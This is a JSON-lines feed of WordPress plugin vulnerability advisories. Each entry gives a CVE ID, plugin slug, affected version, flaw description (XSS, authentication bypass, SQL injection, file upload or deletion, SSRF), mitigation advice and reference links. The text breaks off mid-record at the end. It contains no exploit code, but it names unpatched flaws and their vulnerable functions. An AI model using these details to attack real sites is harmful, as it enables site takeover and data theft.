{"CVE_ID":"CVE-2025-23492","slug":"taobaoke","versionImpact":"1.1.2","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CantonBolo WordPress ????? allows Reflected XSS. This issue affects WordPress ?????: from n\/a through 1.1.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/taobaoke\\\/vulnerability\\\/wordpress-plugin-1-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/taobaoke\\\/vulnerability\\\/wordpress-plugin-1-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1717","slug":"login-me-now","versionImpact":"1.7.2","description":"The Login Me Now plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.7.2. This is due to insecure authentication based on an arbitrary transient name in the 'AutoLogin::listen()' function. This makes it possible for unauthenticated attackers to log in an existing user on the site, even an administrator. Note: this vulnerability requires using a transient name and value from another software, so the plugin is not inherently vulnerable on it's own.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-me-now\\\/tags\\\/1.7.2\\\/app\\\/Logins\\\/BrowserTokenLogin\\\/AutoLogin.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-me-now\\\/tags\\\/1.7.2\\\/app\\\/Logins\\\/BrowserTokenLogin\\\/AutoLogin.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc689622-50d6-47c4-a5f6-0314b1a207c9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc689622-50d6-47c4-a5f6-0314b1a207c9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3844","slug":"peprodev-ups","versionImpact":"7.5.2","description":"The PeproDev Ultimate Profile Solutions plugin for WordPress is vulnerable to Authentication Bypass in versions 1.9.1 to 7.5.2. This is due to handel_ajax_req() function not having proper restrictions on the change_user_meta functionality that makes it possible to set a OTP code and subsequently log in with that OTP code. This makes it possible for unauthenticated attackers to login as other users on the site, including administrators.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peprodev-ups\\\/tags\\\/7.5.2\\\/login\\\/login.php#L1483\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peprodev-ups\\\/tags\\\/7.5.2\\\/login\\\/login.php#L1483\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peprodev-ups\\\/tags\\\/7.5.2\\\/login\\\/login.php#L2836\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peprodev-ups\\\/tags\\\/7.5.2\\\/login\\\/login.php#L2836\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65be9417-7029-4f34-b834-98208a42743b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65be9417-7029-4f34-b834-98208a42743b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5291","slug":"master-slider","versionImpact":"3.10.8","description":"The Master Slider \u2013 Responsive Touch Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's masterslider_pb and ms_slide shortcodes in all versions up to, and including, 3.10.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/tags\\\/3.10.8\\\/includes\\\/msp-shortcodes.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/tags\\\/3.10.8\\\/includes\\\/msp-shortcodes.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/tags\\\/3.10.8\\\/includes\\\/msp-shortcodes.php#L633\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/tags\\\/3.10.8\\\/includes\\\/msp-shortcodes.php#L633\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/tags\\\/3.10.8\\\/includes\\\/msp-shortcodes.php#L763\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/tags\\\/3.10.8\\\/includes\\\/msp-shortcodes.php#L763\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/tags\\\/3.10.8\\\/includes\\\/msp-shortcodes.php#L783\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/tags\\\/3.10.8\\\/includes\\\/msp-shortcodes.php#L783\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309620\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309620\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-slider\\\/#description\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-slider\\\/#description\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce37fbd2-8d41-4feb-adf6-7ca0ca54e27a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce37fbd2-8d41-4feb-adf6-7ca0ca54e27a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1339","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized settings update due to a missing capability check on the uucss_update_rule function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to update caching rules.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19f126f8-1d59-44b5-8e0e-c37f1fbedf5a\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19f126f8-1d59-44b5-8e0e-c37f1fbedf5a\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0537","slug":"product-slider-for-woocommerce-lite","versionImpact":"1.1.7","description":"The Product Slider For WooCommerce Lite WordPress plugin through 1.1.7 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d7369f1d-d1a0-4576-a676-c70525a6c743\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d7369f1d-d1a0-4576-a676-c70525a6c743\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36728","slug":"angwp","versionImpact":"1.5.5","description":"The Adning Advertising plugin for WordPress is vulnerable to file deletion via path traversal in versions up to, and including, 1.5.5. This allows unauthenticated attackers to delete arbitrary files which can be used to reset and gain full control of a site.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/07\\\/critical-vulnerabilities-patched-in-adning-advertising-plugin\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/07\\\/critical-vulnerabilities-patched-in-adning-advertising-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wp-pro-advertising-system-all-in-one-ad-manager\\\/269693\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wp-pro-advertising-system-all-in-one-ad-manager\\\/269693\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-in-adning-advertising-plugin-actively-exploited-in-the-wild\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-in-adning-advertising-plugin-actively-exploited-in-the-wild\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7506429-7f8a-45b5-b1b0-6fdb39599ee5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7506429-7f8a-45b5-b1b0-6fdb39599ee5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4893","slug":"crayon-syntax-highlighter","versionImpact":"2.8.4","description":"The Crayon Syntax Highlighter plugin for WordPress is vulnerable to Server Side Request Forgery via the 'crayon' shortcode in versions up to, and including, 2.8.4. This can allow authenticated attackers with contributor-level permissions or above to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/527f75f1-6361-4e16-8ae4-d38ca4589811?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/527f75f1-6361-4e16-8ae4-d38ca4589811?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crayon-syntax-highlighter\\\/trunk\\\/crayon_highlighter.class.php#L83\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crayon-syntax-highlighter\\\/trunk\\\/crayon_highlighter.class.php#L83\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-49168","slug":"bp-better-messages","versionImpact":"2.4.0","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WordPlus Better Messages \u2013 Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss allows Stored XSS.This issue affects Better Messages \u2013 Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss: from n\/a through 2.4.0.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bp-better-messages\\\/wordpress-bp-better-messages-plugin-2-3-12-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bp-better-messages\\\/wordpress-bp-better-messages-plugin-2-3-12-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1776","slug":"admin-side-data-storage-for-contact-form-7","versionImpact":"1.1.1","description":"The Admin side data storage for Contact Form 7 plugin for WordPress is vulnerable to SQL Injection via the 'form-id' parameter in all versions up to, and including, 1.1.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bff8172-b879-40b0-a229-a54787baa38a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bff8172-b879-40b0-a229-a54787baa38a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-side-data-storage-for-contact-form-7\\\/trunk\\\/inc\\\/admin\\\/inc\\\/settings.php#L301\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-side-data-storage-for-contact-form-7\\\/trunk\\\/inc\\\/admin\\\/inc\\\/settings.php#L301\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3629","slug":"hl-twitter","versionImpact":"2014.1.18","description":"The HL Twitter WordPress plugin through 2014.1.18 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c1f6ed2c-0f84-4b13-b39e-5cb91443c2b1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c1f6ed2c-0f84-4b13-b39e-5cb91443c2b1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5664","slug":"mp3-music-player-by-sonaar","versionImpact":"5.5","description":"The MP3 Audio Player \u2013 Music Player, Podcast Player & Radio by Sonaar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' attribute within the plugin's sonaar_audioplayer shortcode in all versions up to, and including, 5.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c14783d3-68de-49c6-9c54-eb7fc4a7bf94?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c14783d3-68de-49c6-9c54-eb7fc4a7bf94?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mp3-music-player-by-sonaar\\\/tags\\\/5.4.0.2\\\/includes\\\/class-sonaar-music-widget.php#L1853\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mp3-music-player-by-sonaar\\\/tags\\\/5.4.0.2\\\/includes\\\/class-sonaar-music-widget.php#L1853\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115110\\\/mp3-music-player-by-sonaar\\\/trunk\\\/includes\\\/class-sonaar-music-widget.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115110\\\/mp3-music-player-by-sonaar\\\/trunk\\\/includes\\\/class-sonaar-music-widget.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mp3-music-player-by-sonaar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mp3-music-player-by-sonaar\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8547","slug":"simple-popup-plugin","versionImpact":"4.5","description":"The Simple Popup Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's [popup] shortcode in all versions up to, and including, 4.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/217da4de-38df-41ff-b138-f12d4f8999cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/217da4de-38df-41ff-b138-f12d4f8999cd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-popup-plugin\\\/trunk\\\/simple_popup_plugin.php#L87\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-popup-plugin\\\/trunk\\\/simple_popup_plugin.php#L87\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4445","slug":"premium-addons-for-elementor","versionImpact":"4.5.1","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Arbitrary Option Updates in versions up to, and including, 4.5.1. This is due to missing capability and nonce checks in the pa_dismiss_admin_notice AJAX action. This makes it possible for authenticated subscriber+ attackers to change arbitrary options with a restricted value of 1 on vulnerable WordPress sites.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cffb26bc-3d3f-4593-bb36-d2abcd67861e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cffb26bc-3d3f-4593-bb36-d2abcd67861e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ithemes.com\\\/blog\\\/wordpress-vulnerability-report-september-2021-part-2\\\/#ib-toc-anchor-2\",\"name\":\"https:\\\/\\\/ithemes.com\\\/blog\\\/wordpress-vulnerability-report-september-2021-part-2\\\/#ib-toc-anchor-2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2e5b3608-1dfc-468f-b3ae-12ce7c25ee6c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2e5b3608-1dfc-468f-b3ae-12ce7c25ee6c\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/premium-addons-for-elementor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/premium-addons-for-elementor\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2590819%40premium-addons-for-elementor&new=2590819%40premium-addons-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2590819%40premium-addons-for-elementor&new=2590819%40premium-addons-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9934","slug":"wp-imagezoom","versionImpact":"1.1.0","description":"The Wp-ImageZoom WordPress plugin through 1.1.0 does not sanitise and escape some parameters before outputting them back in a page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/53e640a7-833e-40de-93d4-acea28aff5a5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/53e640a7-833e-40de-93d4-acea28aff5a5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11227","slug":"memberlite-shortcodes","versionImpact":"1.3.9","description":"The Memberlite Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's memberlite_accordion shortcode in all versions up to, and including, 1.3.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/memberlite-shortcodes\\\/tags\\\/1.3.9\\\/shortcodes\\\/accordion.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/memberlite-shortcodes\\\/tags\\\/1.3.9\\\/shortcodes\\\/accordion.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195143\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195143\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/memberlite-shortcodes\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/memberlite-shortcodes\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c98e8f4-49b4-4d1e-8e11-e38b676d4af0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c98e8f4-49b4-4d1e-8e11-e38b676d4af0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11945","slug":"email-reminders","versionImpact":"2.0.4","description":"The Email Reminders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 2.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-reminders\\\/trunk\\\/includes\\\/page-rules\\\/rules_shortcodes.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-reminders\\\/trunk\\\/includes\\\/page-rules\\\/rules_shortcodes.php#L70\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202124\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202124\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-reminders\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-reminders\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0adfd13-a9f1-4bec-96ec-6a51cd08e4ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0adfd13-a9f1-4bec-96ec-6a51cd08e4ea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12493","slug":"files-download-delay","versionImpact":"1.0.9","description":"The Files Download Delay plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'fddwrap' shortcode in all versions up to, and including, 1.0.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/files-download-delay\\\/trunk\\\/post.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/files-download-delay\\\/trunk\\\/post.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/files-download-delay\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/files-download-delay\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/217f3595-3c35-46c1-a02c-e8829732a719?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/217f3595-3c35-46c1-a02c-e8829732a719?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23428","slug":"qmean","versionImpact":"2.0","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NotFound QMean \u2013 WordPress Did You Mean allows Reflected XSS. This issue affects QMean \u2013 WordPress Did You Mean: from n\/a through 2.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/qmean\\\/vulnerability\\\/wordpress-qmean-plugin-2-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/qmean\\\/vulnerability\\\/wordpress-qmean-plugin-2-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1338","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized cache modification due to a missing capability check on the attach_rule function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to modify cache rules.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bb55b22-a0d0-424f-8e4f-57d3f239c149\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bb55b22-a0d0-424f-8e4f-57d3f239c149\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0536","slug":"wp-d3","versionImpact":"2.4.1","description":"The Wp-D3 WordPress plugin through 2.4.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7b19d792-8083-4c0c-a45e-a99c1f5f0df0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7b19d792-8083-4c0c-a45e-a99c1f5f0df0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36705","slug":"angwp","versionImpact":"1.5.5","description":"The Adning Advertising plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the _ning_upload_image function in versions up to, and including, 1.5.5. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected sites server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a263b74-e9ae-4fd2-be9b-9b8e9eee5982?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a263b74-e9ae-4fd2-be9b-9b8e9eee5982?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/07\\\/critical-vulnerabilities-patched-in-adning-advertising-plugin\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/07\\\/critical-vulnerabilities-patched-in-adning-advertising-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wp-pro-advertising-system-all-in-one-ad-manager\\\/269693\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wp-pro-advertising-system-all-in-one-ad-manager\\\/269693\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-in-adning-advertising-plugin-actively-exploited-in-the-wild\\\/\",\"name\":\"htt